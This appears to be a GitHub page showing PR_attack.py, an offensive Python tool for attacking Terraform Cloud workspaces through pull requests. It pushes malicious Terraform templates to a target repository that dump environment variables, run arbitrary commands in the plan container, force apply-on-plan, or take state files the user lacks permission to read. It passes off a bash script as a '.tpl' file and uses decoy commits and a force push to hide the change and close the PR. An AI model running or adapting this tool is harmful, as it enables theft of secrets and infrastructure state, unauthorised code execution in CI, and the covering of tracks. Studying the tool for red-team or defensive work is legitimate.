-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathPR_attack.py
More file actions
255 lines (222 loc) · 12 KB
/
PR_attack.py
File metadata and controls
255 lines (222 loc) · 12 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
### Variable Info ###
# the "repo" argument is the git repo of a TF workspace that is going to be cloned and targeted by these attacks
# the "folder" argument is the name of the directory within the git repo that holds the .tf files
# "tmp folder" is the parent directory where the targeted repository is being cloned to.
# So the full path looks something like:
# .../tmp/repo/folder
###
import argparse
import os
import subprocess
from string import Template
import tempfile
import shutil
import sys
import re
# This will be the name of the temporal branch used to commit the malicious code
TMP_BRANCH = "SEC-0000"
SCRIPT_PATH = ""
def get_script_path():
return os.path.dirname(os.path.realpath(sys.argv[0]))
# It checks if the git binary is present in the system
def check_git_binary():
try:
output = subprocess.getoutput("git --version")
print("[+] Found git client, %s" % output.split('\n')[0])
return True
except FileNotFoundError as f:
return False
# It creates a temporal folder that will be used to clone the target repository and add the malicious tf code
def setup_temp_folder(repo):
tmp_folder = tempfile.mkdtemp()
print(f"[+] Created temporal folder {tmp_folder}")
# First we clone the repository
print(f"[+] Cloning repository {repo}")
output = subprocess.getoutput(f"git clone --progress {repo} {tmp_folder}")
if not "done" in output:
print(f"[!] It seems like there is some issue cloning the repo you provided, check it manually:\ngit clone {repo}")
shutil.rmtree(tmp_folder)
exit(-1)
# Second, we create a branch to add the malicious files
print(f"[+] Creating branch {TMP_BRANCH}")
os.chdir(tmp_folder)
output = subprocess.getoutput(f"git branch -a")
if re.search(TMP_BRANCH, output) != None:
print(f"[!] {TMP_BRANCH} already exists, you can delete it with the following command:")
print(f"cd {tmp_folder}; git push origin --delete {TMP_BRANCH}; cd -")
#TODO: Remove this
subprocess.getoutput(f"cd {tmp_folder}; git push origin --delete {TMP_BRANCH}; cd -")
#exit(-1)
subprocess.getoutput(f"git checkout -b {TMP_BRANCH}")
return tmp_folder
# Attack 1 - exfil all env vars into TF plan results
# TODO - add option to exfil to an external host
def get_all_envs(tmp_folder, terraform_folder):
# Copying template to temp folder
src_file = os.path.join(SCRIPT_PATH, "templates/get_all_envs.tf")
# We use a name that is generic but unique
dst_file = os.path.join(tmp_folder, terraform_folder, "template_instance000.tf")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
# We add the file performing the attack
print("[+] Commiting get_all_envs locally")
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "template_instance000.tf"))
output = subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
print("[+] Pushing get_all_envs commit to origin")
output = subprocess.getoutput("git push origin " + TMP_BRANCH)
url_pr = re.search(f"http.*{TMP_BRANCH}", output).group(0)
return url_pr
def exec_command(tmp_folder, terraform_folder, command):
# Copying template to temp folder
src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
# We use a name that is generic but unique
dst_file = os.path.join(tmp_folder, terraform_folder, "template_instance001.tf")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
s = Template(open(dst_file, "r").read())
template_filled = s.substitute(command=command)
open(dst_file, "w").write(template_filled)
# We add the file performing the attack
print("[+] Commiting the template locally")
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "template_instance001.tf"))
output = subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
print("[+] Pushing exec_command commit to origin")
output = subprocess.getoutput("git push origin " + TMP_BRANCH)
url_pr = re.search(f"http.*{TMP_BRANCH}", output).group(0)
return url_pr
def apply_on_plan(tmp_folder, terraform_folder, tf_file_to_apply):
# Copying template to execute a command
src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
# We use a name that is generic but unique
dst_file = os.path.join(tmp_folder, terraform_folder, "template_instance002.tf")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
s = Template(open(dst_file, "r").read())
# The command we will run is a bash script
template_filled = s.substitute(command="bash instance.tpl")
open(dst_file, "w").write(template_filled)
# We add the "malicious tf file"
src_file = os.path.join(SCRIPT_PATH, tf_file_to_apply)
dst_file = os.path.join(tmp_folder, terraform_folder, "template_instance003")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
# We add the bash script that performs the apply
# Pretend the malicious script is a .tpl file
src_file = os.path.join(SCRIPT_PATH, "templates/apply_on_plan.sh")
dst_file = os.path.join(tmp_folder, terraform_folder, "instance.tpl")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
# We add the file performing the attack
print("[+] Commiting the template locally")
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "template_instance002.tf"))
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "template_instance003"))
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "instance.tpl"))
output = subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
print("[+] Pushing commit to origin")
output = subprocess.getoutput("git push origin " + TMP_BRANCH)
url_pr = re.search(f"http.*{TMP_BRANCH}", output).group(0)
return url_pr
def get_state_file(tmp_folder, terraform_folder, workspace=None):
# Copying template to execute a command
src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
# We use a name that is generic but unique
dst_file = os.path.join(tmp_folder, terraform_folder, "template_instance002.tf")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
s = Template(open(dst_file, "r").read())
# The command we will run is a bash script
if workspace != None:
command = f"bash instance.tpl {workspace}"
template_filled = s.substitute(command=command)
else:
template_filled = s.substitute(command="bash instance.tpl")
open(dst_file, "w").write(template_filled)
# We add the bash script that performs the tf statefile exfil
# Pretend the malicious script is a .tpl file
src_file = os.path.join(SCRIPT_PATH, "templates/retrieve_state_file.sh")
dst_file = os.path.join(tmp_folder, terraform_folder, "instance.tpl")
print(f"[+] Copying template file from {src_file} to {dst_file}")
shutil.copy(src_file, dst_file)
# We add the file performing the attack
print("[+] Commiting the template locally")
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "template_instance002.tf"))
output = subprocess.getoutput("git add " + os.path.join(terraform_folder, "instance.tpl"))
output = subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
print("[+] Pushing commit to origin")
output = subprocess.getoutput("git push origin " + TMP_BRANCH)
url_pr = re.search(f"http.*{TMP_BRANCH}", output).group(0)
return url_pr
# To be a bit more sneaky we commit a couple times so it's not as easy to see the malicious code in the PR
def rewrite_history(tmp_folder, terraform_folder):
# First commit
fake_template = """
resource "aws_ec2_host" "template_instance" {
instance_type = "c5.large"
availability_zone = "us-west-2a"
}
"""
open(os.path.join(terraform_folder, "template_instance000.tf"), "w").write(fake_template)
subprocess.getoutput("git add nullprovider/template_instance000.tf")
subprocess.getoutput("git commit -m 'Adding EC2 template'")
print("[+] Pushing one commit replacing the malicious template")
subprocess.getoutput("git push origin SEC-0000")
# Second commit
fake_template = """
resource "aws_ec2_host" "template_instance" {
instance_type = "c4.large"
availability_zone = "us-west-2a"
}
"""
open(os.path.join(terraform_folder, "template_instance000.tf"), "w").write(fake_template)
subprocess.getoutput("git add nullprovider/template_instance000.tf")
subprocess.getoutput("git commit -m 'Changing instance size to c4'")
print("[+] Pushing one commit with a fake fix")
subprocess.getoutput("git push origin SEC-0000")
# Reset HEAD and force push to rewrite history
subprocess.getoutput("git fetch origin && git reset --hard origin/main")
print("[+] Rewriting history, this will automatically close the PR")
subprocess.getoutput("git push --force origin SEC-0000")
def parse_args():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--repo', type=str, help="Github repository (SSH url) that is going to be targeted", required=True)
arg_parser.add_argument('--folder', type=str, help="Folder in the repo that contains the terraform files where you wish the attack to take place", required=True)
attack = arg_parser.add_mutually_exclusive_group(required=True)
attack.add_argument('--get_envs', action='store_true', help="This retrieves the environment variables from a TF workspaces")
attack.add_argument('--get_state_file', action='store_true', help="This retrieves the state file of the current TF workspace through a TF plan; useful when the user doesn't have permissions to access the state file")
attack.add_argument('--get_state_file_from_workspace', type=str, help="This retrieves the state file of a supplied workspace name through a TF plan; useful when the user doesn't have permissions to access the state file")
attack.add_argument('--exec_command', type=str, help="Runs a command in the container used to run the speculative plan, useful to access TFC infra and access Cloud metadata if misconfigured")
attack.add_argument('--apply_on_plan', type=str, help="Apply on plan an specified tf file")
return arg_parser.parse_args()
def main():
args = parse_args()
global SCRIPT_PATH
SCRIPT_PATH = get_script_path()
if not check_git_binary():
print("git binary not found in your system")
exit(-1)
# Create a temp folder to use it during the attack
tmp_folder = setup_temp_folder(args.repo)
if args.get_envs:
url_pr = get_all_envs(tmp_folder, args.folder)
elif args.exec_command:
url_pr = exec_command(tmp_folder, args.folder, args.exec_command)
elif args.apply_on_plan:
url_pr = apply_on_plan(tmp_folder, args.folder, args.apply_on_plan)
elif args.get_state_file:
url_pr = get_state_file(tmp_folder, args.folder)
elif args.get_state_file_from_workspace:
url_pr = get_state_file(tmp_folder, args.folder, args.get_state_file_from_workspace)
# Show to the user the URL to create a Github PR
print("[!] Visit the following URL to complete the PR that will trigger the TF attack")
if args.get_envs or args.exec_command:
print("[!] Once the PR is created, view the TF plan results for your environment variables")
print(url_pr)
# ToDo: Tell the user to check for the output
# ToDo : Ask user if he/she wants to rewrite history to delete what we did
# (Do that only after the PR has been submmited)
answer = input("Press any key when you have finished the plan to begin cleanup")
rewrite_history(tmp_folder, args.folder)
# Remove temporal folder
shutil.rmtree(tmp_folder)
if __name__ == "__main__":
main()